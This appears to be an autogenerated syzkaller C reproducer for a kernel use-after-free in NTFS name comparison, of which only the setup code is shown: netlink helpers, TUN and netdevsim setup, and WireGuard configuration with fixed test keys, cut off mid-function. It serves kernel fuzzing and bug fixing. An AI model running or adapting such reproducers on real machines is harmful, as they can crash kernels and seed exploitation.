// KASAN: use-after-free Read in ntfs_are_names_equal
// https://syzkaller.appspot.com/bug?id=ecbcf37464c627253e44
// status:0
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/loop.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/rfkill.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

static unsigned long long procid;

static __thread int skip_segv;
static __thread jmp_buf segv_env;

static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
  uintptr_t addr = (uintptr_t)info->si_addr;
  const uintptr_t prog_start = 1 << 20;
  const uintptr_t prog_end = 100 << 20;
  int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
  int valid = addr < prog_start || addr > prog_end;
  if (skip && valid) {
    _longjmp(segv_env, 1);
  }
  exit(sig);
}

static void install_segv_handler(void)
{
  struct sigaction sa;
  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = SIG_IGN;
  syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
  syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
  memset(&sa, 0, sizeof(sa));
  sa.sa_sigaction = segv_handler;
  sa.sa_flags = SA_NODEFER | SA_SIGINFO;
  sigaction(SIGSEGV, &sa, NULL);
  sigaction(SIGBUS, &sa, NULL);
}

#define NONFAILING(...)                                                        \
  ({                                                                           \
    int ok = 1;                                                                \
    __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST);                       \
    if (_setjmp(segv_env) == 0) {                                              \
      __VA_ARGS__;                                                             \
    } else                                                                     \
      ok = 0;                                                                  \
    __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST);                       \
    ok;                                                                        \
  })

static void use_temporary_dir(void)
{
  char tmpdir_template[] = "./syzkaller.XXXXXX";
  char* tmpdir = mkdtemp(tmpdir_template);
  if (!tmpdir)
    exit(1);
  if (chmod(tmpdir, 0777))
    exit(1);
  if (chdir(tmpdir))
    exit(1);
}

static bool write_file(const char* file, const char* what, ...)
{
  char buf[1024];
  va_list args;
  va_start(args, what);
  vsnprintf(buf, sizeof(buf), what, args);
  va_end(args);
  buf[sizeof(buf) - 1] = 0;
  int len = strlen(buf);
  int fd = open(file, O_WRONLY | O_CLOEXEC);
  if (fd == -1)
    return false;
  if (write(fd, buf, len) != len) {
    int err = errno;
    close(fd);
    errno = err;
    return false;
  }
  close(fd);
  return true;
}

struct nlmsg {
  char* pos;
  int nesting;
  struct nlattr* nested[8];
  char buf[4096];
};

static void netlink_init(struct nlmsg* nlmsg, int typ, int flags,
                         const void* data, int size)
{
  memset(nlmsg, 0, sizeof(*nlmsg));
  struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf;
  hdr->nlmsg_type = typ;
  hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
  memcpy(hdr + 1, data, size);
  nlmsg->pos = (char*)(hdr + 1) + NLMSG_ALIGN(size);
}

static void netlink_attr(struct nlmsg* nlmsg, int typ, const void* data,
                         int size)
{
  struct nlattr* attr = (struct nlattr*)nlmsg->pos;
  attr->nla_len = sizeof(*attr) + size;
  attr->nla_type = typ;
  if (size > 0)
    memcpy(attr + 1, data, size);
  nlmsg->pos += NLMSG_ALIGN(attr->nla_len);
}

static void netlink_nest(struct nlmsg* nlmsg, int typ)
{
  struct nlattr* attr = (struct nlattr*)nlmsg->pos;
  attr->nla_type = typ;
  nlmsg->pos += sizeof(*attr);
  nlmsg->nested[nlmsg->nesting++] = attr;
}

static void netlink_done(struct nlmsg* nlmsg)
{
  struct nlattr* attr = nlmsg->nested[--nlmsg->nesting];
  attr->nla_len = nlmsg->pos - (char*)attr;
}

static int netlink_send_ext(struct nlmsg* nlmsg, int sock, uint16_t reply_type,
                            int* reply_len)
{
  if (nlmsg->pos > nlmsg->buf + sizeof(nlmsg->buf) || nlmsg->nesting)
    exit(1);
  struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf;
  hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;
  struct sockaddr_nl addr;
  memset(&addr, 0, sizeof(addr));
  addr.nl_family = AF_NETLINK;
  unsigned n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0,
                      (struct sockaddr*)&addr, sizeof(addr));
  if (n != hdr->nlmsg_len)
    exit(1);
  n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
  if (reply_len)
    *reply_len = 0;
  if (hdr->nlmsg_type == NLMSG_DONE)
    return 0;
  if (n < sizeof(struct nlmsghdr))
    exit(1);
  if (reply_len && hdr->nlmsg_type == reply_type) {
    *reply_len = n;
    return 0;
  }
  if (n < sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))
    exit(1);
  if (hdr->nlmsg_type != NLMSG_ERROR)
    exit(1);
  return ((struct nlmsgerr*)(hdr + 1))->error;
}

static int netlink_send(struct nlmsg* nlmsg, int sock)
{
  return netlink_send_ext(nlmsg, sock, 0, NULL);
}

static int netlink_query_family_id(struct nlmsg* nlmsg, int sock,
                                   const char* family_name)
{
  struct genlmsghdr genlhdr;
  memset(&genlhdr, 0, sizeof(genlhdr));
  genlhdr.cmd = CTRL_CMD_GETFAMILY;
  netlink_init(nlmsg, GENL_ID_CTRL, 0, &genlhdr, sizeof(genlhdr));
  netlink_attr(nlmsg, CTRL_ATTR_FAMILY_NAME, family_name,
               strnlen(family_name, GENL_NAMSIZ - 1) + 1);
  int n = 0;
  int err = netlink_send_ext(nlmsg, sock, GENL_ID_CTRL, &n);
  if (err < 0) {
    return -1;
  }
  uint16_t id = 0;
  struct nlattr* attr = (struct nlattr*)(nlmsg->buf + NLMSG_HDRLEN +
                                         NLMSG_ALIGN(sizeof(genlhdr)));
  for (; (char*)attr < nlmsg->buf + n;
       attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) {
    if (attr->nla_type == CTRL_ATTR_FAMILY_ID) {
      id = *(uint16_t*)(attr + 1);
      break;
    }
  }
  if (!id) {
    return -1;
  }
  recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
  return id;
}

static int netlink_next_msg(struct nlmsg* nlmsg, unsigned int offset,
                            unsigned int total_len)
{
  struct nlmsghdr* hdr = (struct nlmsghdr*)(nlmsg->buf + offset);
  if (offset == total_len || offset + hdr->nlmsg_len > total_len)
    return -1;
  return hdr->nlmsg_len;
}

static void netlink_add_device_impl(struct nlmsg* nlmsg, const char* type,
                                    const char* name)
{
  struct ifinfomsg hdr;
  memset(&hdr, 0, sizeof(hdr));
  netlink_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr,
               sizeof(hdr));
  if (name)
    netlink_attr(nlmsg, IFLA_IFNAME, name, strlen(name));
  netlink_nest(nlmsg, IFLA_LINKINFO);
  netlink_attr(nlmsg, IFLA_INFO_KIND, type, strlen(type));
}

static void netlink_add_device(struct nlmsg* nlmsg, int sock, const char* type,
                               const char* name)
{
  netlink_add_device_impl(nlmsg, type, name);
  netlink_done(nlmsg);
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static void netlink_add_veth(struct nlmsg* nlmsg, int sock, const char* name,
                             const char* peer)
{
  netlink_add_device_impl(nlmsg, "veth", name);
  netlink_nest(nlmsg, IFLA_INFO_DATA);
  netlink_nest(nlmsg, VETH_INFO_PEER);
  nlmsg->pos += sizeof(struct ifinfomsg);
  netlink_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer));
  netlink_done(nlmsg);
  netlink_done(nlmsg);
  netlink_done(nlmsg);
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static void netlink_add_hsr(struct nlmsg* nlmsg, int sock, const char* name,
                            const char* slave1, const char* slave2)
{
  netlink_add_device_impl(nlmsg, "hsr", name);
  netlink_nest(nlmsg, IFLA_INFO_DATA);
  int ifindex1 = if_nametoindex(slave1);
  netlink_attr(nlmsg, IFLA_HSR_SLAVE1, &ifindex1, sizeof(ifindex1));
  int ifindex2 = if_nametoindex(slave2);
  netlink_attr(nlmsg, IFLA_HSR_SLAVE2, &ifindex2, sizeof(ifindex2));
  netlink_done(nlmsg);
  netlink_done(nlmsg);
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static void netlink_add_linked(struct nlmsg* nlmsg, int sock, const char* type,
                               const char* name, const char* link)
{
  netlink_add_device_impl(nlmsg, type, name);
  netlink_done(nlmsg);
  int ifindex = if_nametoindex(link);
  netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static void netlink_add_vlan(struct nlmsg* nlmsg, int sock, const char* name,
                             const char* link, uint16_t id, uint16_t proto)
{
  netlink_add_device_impl(nlmsg, "vlan", name);
  netlink_nest(nlmsg, IFLA_INFO_DATA);
  netlink_attr(nlmsg, IFLA_VLAN_ID, &id, sizeof(id));
  netlink_attr(nlmsg, IFLA_VLAN_PROTOCOL, &proto, sizeof(proto));
  netlink_done(nlmsg);
  netlink_done(nlmsg);
  int ifindex = if_nametoindex(link);
  netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static void netlink_add_macvlan(struct nlmsg* nlmsg, int sock, const char* name,
                                const char* link)
{
  netlink_add_device_impl(nlmsg, "macvlan", name);
  netlink_nest(nlmsg, IFLA_INFO_DATA);
  uint32_t mode = MACVLAN_MODE_BRIDGE;
  netlink_attr(nlmsg, IFLA_MACVLAN_MODE, &mode, sizeof(mode));
  netlink_done(nlmsg);
  netlink_done(nlmsg);
  int ifindex = if_nametoindex(link);
  netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static void netlink_add_geneve(struct nlmsg* nlmsg, int sock, const char* name,
                               uint32_t vni, struct in_addr* addr4,
                               struct in6_addr* addr6)
{
  netlink_add_device_impl(nlmsg, "geneve", name);
  netlink_nest(nlmsg, IFLA_INFO_DATA);
  netlink_attr(nlmsg, IFLA_GENEVE_ID, &vni, sizeof(vni));
  if (addr4)
    netlink_attr(nlmsg, IFLA_GENEVE_REMOTE, addr4, sizeof(*addr4));
  if (addr6)
    netlink_attr(nlmsg, IFLA_GENEVE_REMOTE6, addr6, sizeof(*addr6));
  netlink_done(nlmsg);
  netlink_done(nlmsg);
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

#define IFLA_IPVLAN_FLAGS 2
#define IPVLAN_MODE_L3S 2
#undef IPVLAN_F_VEPA
#define IPVLAN_F_VEPA 2

static void netlink_add_ipvlan(struct nlmsg* nlmsg, int sock, const char* name,
                               const char* link, uint16_t mode, uint16_t flags)
{
  netlink_add_device_impl(nlmsg, "ipvlan", name);
  netlink_nest(nlmsg, IFLA_INFO_DATA);
  netlink_attr(nlmsg, IFLA_IPVLAN_MODE, &mode, sizeof(mode));
  netlink_attr(nlmsg, IFLA_IPVLAN_FLAGS, &flags, sizeof(flags));
  netlink_done(nlmsg);
  netlink_done(nlmsg);
  int ifindex = if_nametoindex(link);
  netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static void netlink_device_change(struct nlmsg* nlmsg, int sock,
                                  const char* name, bool up, const char* master,
                                  const void* mac, int macsize,
                                  const char* new_name)
{
  struct ifinfomsg hdr;
  memset(&hdr, 0, sizeof(hdr));
  if (up)
    hdr.ifi_flags = hdr.ifi_change = IFF_UP;
  hdr.ifi_index = if_nametoindex(name);
  netlink_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
  if (new_name)
    netlink_attr(nlmsg, IFLA_IFNAME, new_name, strlen(new_name));
  if (master) {
    int ifindex = if_nametoindex(master);
    netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex));
  }
  if (macsize)
    netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize);
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static int netlink_add_addr(struct nlmsg* nlmsg, int sock, const char* dev,
                            const void* addr, int addrsize)
{
  struct ifaddrmsg hdr;
  memset(&hdr, 0, sizeof(hdr));
  hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6;
  hdr.ifa_prefixlen = addrsize == 4 ? 24 : 120;
  hdr.ifa_scope = RT_SCOPE_UNIVERSE;
  hdr.ifa_index = if_nametoindex(dev);
  netlink_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr,
               sizeof(hdr));
  netlink_attr(nlmsg, IFA_LOCAL, addr, addrsize);
  netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize);
  return netlink_send(nlmsg, sock);
}

static void netlink_add_addr4(struct nlmsg* nlmsg, int sock, const char* dev,
                              const char* addr)
{
  struct in_addr in_addr;
  inet_pton(AF_INET, addr, &in_addr);
  int err = netlink_add_addr(nlmsg, sock, dev, &in_addr, sizeof(in_addr));
  (void)err;
}

static void netlink_add_addr6(struct nlmsg* nlmsg, int sock, const char* dev,
                              const char* addr)
{
  struct in6_addr in6_addr;
  inet_pton(AF_INET6, addr, &in6_addr);
  int err = netlink_add_addr(nlmsg, sock, dev, &in6_addr, sizeof(in6_addr));
  (void)err;
}

static void netlink_add_neigh(struct nlmsg* nlmsg, int sock, const char* name,
                              const void* addr, int addrsize, const void* mac,
                              int macsize)
{
  struct ndmsg hdr;
  memset(&hdr, 0, sizeof(hdr));
  hdr.ndm_family = addrsize == 4 ? AF_INET : AF_INET6;
  hdr.ndm_ifindex = if_nametoindex(name);
  hdr.ndm_state = NUD_PERMANENT;
  netlink_init(nlmsg, RTM_NEWNEIGH, NLM_F_EXCL | NLM_F_CREATE, &hdr,
               sizeof(hdr));
  netlink_attr(nlmsg, NDA_DST, addr, addrsize);
  netlink_attr(nlmsg, NDA_LLADDR, mac, macsize);
  int err = netlink_send(nlmsg, sock);
  (void)err;
}

static struct nlmsg nlmsg;

static int tunfd = -1;

#define TUN_IFACE "syz_tun"
#define LOCAL_MAC 0xaaaaaaaaaaaa
#define REMOTE_MAC 0xaaaaaaaaaabb
#define LOCAL_IPV4 "172.20.20.170"
#define REMOTE_IPV4 "172.20.20.187"
#define LOCAL_IPV6 "fe80::aa"
#define REMOTE_IPV6 "fe80::bb"

#define IFF_NAPI 0x0010

static void initialize_tun(void)
{
  tunfd = open("/dev/net/tun", O_RDWR | O_NONBLOCK);
  if (tunfd == -1) {
    printf("tun: can't open /dev/net/tun: please enable CONFIG_TUN=y\n");
    printf("otherwise fuzzing or reproducing might not work as intended\n");
    return;
  }
  const int kTunFd = 240;
  if (dup2(tunfd, kTunFd) < 0)
    exit(1);
  close(tunfd);
  tunfd = kTunFd;
  struct ifreq ifr;
  memset(&ifr, 0, sizeof(ifr));
  strncpy(ifr.ifr_name, TUN_IFACE, IFNAMSIZ);
  ifr.ifr_flags = IFF_TAP | IFF_NO_PI;
  if (ioctl(tunfd, TUNSETIFF, (void*)&ifr) < 0) {
    exit(1);
  }
  char sysctl[64];
  sprintf(sysctl, "/proc/sys/net/ipv6/conf/%s/accept_dad", TUN_IFACE);
  write_file(sysctl, "0");
  sprintf(sysctl, "/proc/sys/net/ipv6/conf/%s/router_solicitations", TUN_IFACE);
  write_file(sysctl, "0");
  int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  if (sock == -1)
    exit(1);
  netlink_add_addr4(&nlmsg, sock, TUN_IFACE, LOCAL_IPV4);
  netlink_add_addr6(&nlmsg, sock, TUN_IFACE, LOCAL_IPV6);
  uint64_t macaddr = REMOTE_MAC;
  struct in_addr in_addr;
  inet_pton(AF_INET, REMOTE_IPV4, &in_addr);
  netlink_add_neigh(&nlmsg, sock, TUN_IFACE, &in_addr, sizeof(in_addr),
                    &macaddr, ETH_ALEN);
  struct in6_addr in6_addr;
  inet_pton(AF_INET6, REMOTE_IPV6, &in6_addr);
  netlink_add_neigh(&nlmsg, sock, TUN_IFACE, &in6_addr, sizeof(in6_addr),
                    &macaddr, ETH_ALEN);
  macaddr = LOCAL_MAC;
  netlink_device_change(&nlmsg, sock, TUN_IFACE, true, 0, &macaddr, ETH_ALEN,
                        NULL);
  close(sock);
}

#define DEVLINK_FAMILY_NAME "devlink"

#define DEVLINK_CMD_PORT_GET 5
#define DEVLINK_ATTR_BUS_NAME 1
#define DEVLINK_ATTR_DEV_NAME 2
#define DEVLINK_ATTR_NETDEV_NAME 7

static struct nlmsg nlmsg2;

static void initialize_devlink_ports(const char* bus_name, const char* dev_name,
                                     const char* netdev_prefix)
{
  struct genlmsghdr genlhdr;
  int len, total_len, id, err, offset;
  uint16_t netdev_index;
  int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
  if (sock == -1)
    exit(1);
  int rtsock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  if (rtsock == -1)
    exit(1);
  id = netlink_query_family_id(&nlmsg, sock, DEVLINK_FAMILY_NAME);
  if (id == -1)
    goto error;
  memset(&genlhdr, 0, sizeof(genlhdr));
  genlhdr.cmd = DEVLINK_CMD_PORT_GET;
  netlink_init(&nlmsg, id, NLM_F_DUMP, &genlhdr, sizeof(genlhdr));
  netlink_attr(&nlmsg, DEVLINK_ATTR_BUS_NAME, bus_name, strlen(bus_name) + 1);
  netlink_attr(&nlmsg, DEVLINK_ATTR_DEV_NAME, dev_name, strlen(dev_name) + 1);
  err = netlink_send_ext(&nlmsg, sock, id, &total_len);
  if (err < 0) {
    goto error;
  }
  offset = 0;
  netdev_index = 0;
  while ((len = netlink_next_msg(&nlmsg, offset, total_len)) != -1) {
    struct nlattr* attr = (struct nlattr*)(nlmsg.buf + offset + NLMSG_HDRLEN +
                                           NLMSG_ALIGN(sizeof(genlhdr)));
    for (; (char*)attr < nlmsg.buf + offset + len;
         attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) {
      if (attr->nla_type == DEVLINK_ATTR_NETDEV_NAME) {
        char* port_name;
        char netdev_name[IFNAMSIZ];
        port_name = (char*)(attr + 1);
        snprintf(netdev_name, sizeof(netdev_name), "%s%d", netdev_prefix,
                 netdev_index);
        netlink_device_change(&nlmsg2, rtsock, port_name, true, 0, 0, 0,
                              netdev_name);
        break;
      }
    }
    offset += len;
    netdev_index++;
  }
error:
  close(rtsock);
  close(sock);
}

#define DEV_IPV4 "172.20.20.%d"
#define DEV_IPV6 "fe80::%02x"
#define DEV_MAC 0x00aaaaaaaaaa

static void netdevsim_add(unsigned int addr, unsigned int port_count)
{
  char buf[16];
  sprintf(buf, "%u %u", addr, port_count);
  if (write_file("/sys/bus/netdevsim/new_device", buf)) {
    snprintf(buf, sizeof(buf), "netdevsim%d", addr);
    initialize_devlink_ports("netdevsim", buf, "netdevsim");
  }
}

#define WG_GENL_NAME "wireguard"
enum wg_cmd {
  WG_CMD_GET_DEVICE,
  WG_CMD_SET_DEVICE,
};
enum wgdevice_attribute {
  WGDEVICE_A_UNSPEC,
  WGDEVICE_A_IFINDEX,
  WGDEVICE_A_IFNAME,
  WGDEVICE_A_PRIVATE_KEY,
  WGDEVICE_A_PUBLIC_KEY,
  WGDEVICE_A_FLAGS,
  WGDEVICE_A_LISTEN_PORT,
  WGDEVICE_A_FWMARK,
  WGDEVICE_A_PEERS,
};
enum wgpeer_attribute {
  WGPEER_A_UNSPEC,
  WGPEER_A_PUBLIC_KEY,
  WGPEER_A_PRESHARED_KEY,
  WGPEER_A_FLAGS,
  WGPEER_A_ENDPOINT,
  WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
  WGPEER_A_LAST_HANDSHAKE_TIME,
  WGPEER_A_RX_BYTES,
  WGPEER_A_TX_BYTES,
  WGPEER_A_ALLOWEDIPS,
  WGPEER_A_PROTOCOL_VERSION,
};
enum wgallowedip_attribute {
  WGALLOWEDIP_A_UNSPEC,
  WGALLOWEDIP_A_FAMILY,
  WGALLOWEDIP_A_IPADDR,
  WGALLOWEDIP_A_CIDR_MASK,
};

static void netlink_wireguard_setup(void)
{
  const char ifname_a[] = "wg0";
  const char ifname_b[] = "wg1";
  const char ifname_c[] = "wg2";
  const char private_a[] = "\xa0\x5c\xa8\x4f\x6c\x9c\x8e\x38\x53\xe2\xfd\x7a"
                           "\x70\xae\x0f\xb2\x0f\xa1\x52\x60\x0c\xb0\x08\x45"
                           "\x17\x4f\x08\x07\x6f\x8d\x78\x43";
  const char private_b[] = "\xb0\x80\x73\xe8\xd4\x4e\x91\xe3\xda\x92\x2c\x22"
                           "\x43\x82\x44\xbb\x88\x5c\x69\xe2\x69\xc8\xe9\xd8"
                           "\x35\xb1\x14\x29\x3a\x4d\xdc\x6e";
  const char private_c[] = "\xa0\xcb\x87\x9a\x47\xf5\xbc\x64\x4c\x0e\x69\x3f"
                           "\xa6\xd0\x31\xc7\x4a\x15\x53\xb6\xe9\x01\xb9\xff"
                           "\x2f\x51\x8c\x78\x04\x2f\xb5\x42";
  const char public_a[] = "\x97\x5c\x9d\x81\xc9\x83\xc8\x20\x9e\xe7\x81\x25\x4b"
                          "\x89\x9f\x8e\xd9\x25\xae\x9f\x09\x23\xc2\x3c\x62\xf5"
                          "\x3c\x57\xcd\xbf\x69\x1c";
  const char public_b[] = "\xd1\x73\x28\x99\xf6\x11\xcd\x89\x94\x03\x4d\x7f\x41"
                          "\x3d\xc9\x57\x63\x0e\x54\x93\xc2\x85\xac\xa4\x00\x65"
                          "\xcb\x63\x11\xbe\x69\x6b";
  const char public_c[] = "\xf4\x4d\xa3\x67\xa8\x8e\xe6\x56\x4f\x02\x02\x11\x45"
                          "\x67\x27\x08\x2f\x5c\xeb\xee\x8b\x1b\xf5\xeb\x73\x37"
                          "\x34\x1b\x45\x9b\x39\x22";
  const uint16_t listen_a = 20001;
  const uint16_t listen_b = 20002;
  const uint16_t listen_c = 20003;
  const uint16_t af_inet = AF_INET;
  const uint16_t af_inet6 = AF_INET6;
  const struct sockaddr_in endpoint_b_v4 = {
      .sin_family = AF_INET,
      .sin_port = htons(listen_b),
      .sin_addr = {htonl(INADDR_LOOPBACK)}};
  const struct sockaddr_in endpoint_c_v4 = {
      .sin_family = AF_INET,
      .sin_port = htons(listen_c),
      .sin_addr = {htonl(INADDR_LOOPBACK)}};
  struct sockaddr_in6 endpoint_a_v6 = {.sin6_family = AF_INET6,
                                       .sin6_port = htons(listen_a)};
  endpoint_a_v6.sin6_addr = in6addr_loopback;
  struct sockaddr_in6 endpoint_c_v6 = {.sin6_family = AF_INET6,
                                       .sin6_port = htons(listen_c)};
  endpoint_c_v6.sin6_addr = in6addr_loopback;
  const struct in_addr first_half_v4 = {0};
  const struct in_addr second_half_v4 = {(uint32_t)htonl(128 << 24)};
  const struct in6_addr first_half_v6 = {{{0}}};
  const struct in6_addr second_half_v6 = {{{0x80}}};
  const uint8_t half_cidr = 1;
  const uint16_t persistent_keepalives[] = {1, 3, 7, 9, 14, 19};
  struct genlmsghdr genlhdr = {.cmd = WG_CMD_SET_DEVICE, .version = 1};
  int sock;
  int id, err;
  sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
  if (sock == -1) {
    return;
  }
  id = netlink_query_family_id(&nlmsg, sock, WG_GENL_NAME);
  if (id == -1)
    goto error;
  netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
  netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_a, strlen(ifname_a) + 1);
  netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_a, 32);
  netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_a, 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32);
  netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4,
               sizeof(endpoint_b_v4));
  netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
               &persistent_keepalives[0], 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4,
               sizeof(first_half_v4));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6,
               sizeof(first_half_v6));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32);
  netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v6,
               sizeof(endpoint_c_v6));
  netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
               &persistent_keepalives[1], 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4,
               sizeof(second_half_v4));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6,
               sizeof(second_half_v6));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  err = netlink_send(&nlmsg, sock);
  if (err < 0) {
  }
  netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
  netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_b, strlen(ifname_b) + 1);
  netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_b, 32);
  netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_b, 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32);
  netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6,
               sizeof(endpoint_a_v6));
  netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
               &persistent_keepalives[2], 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4,
               sizeof(first_half_v4));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6,
               sizeof(first_half_v6));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32);
  netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v4,
               sizeof(endpoint_c_v4));
  netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
               &persistent_keepalives[3], 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
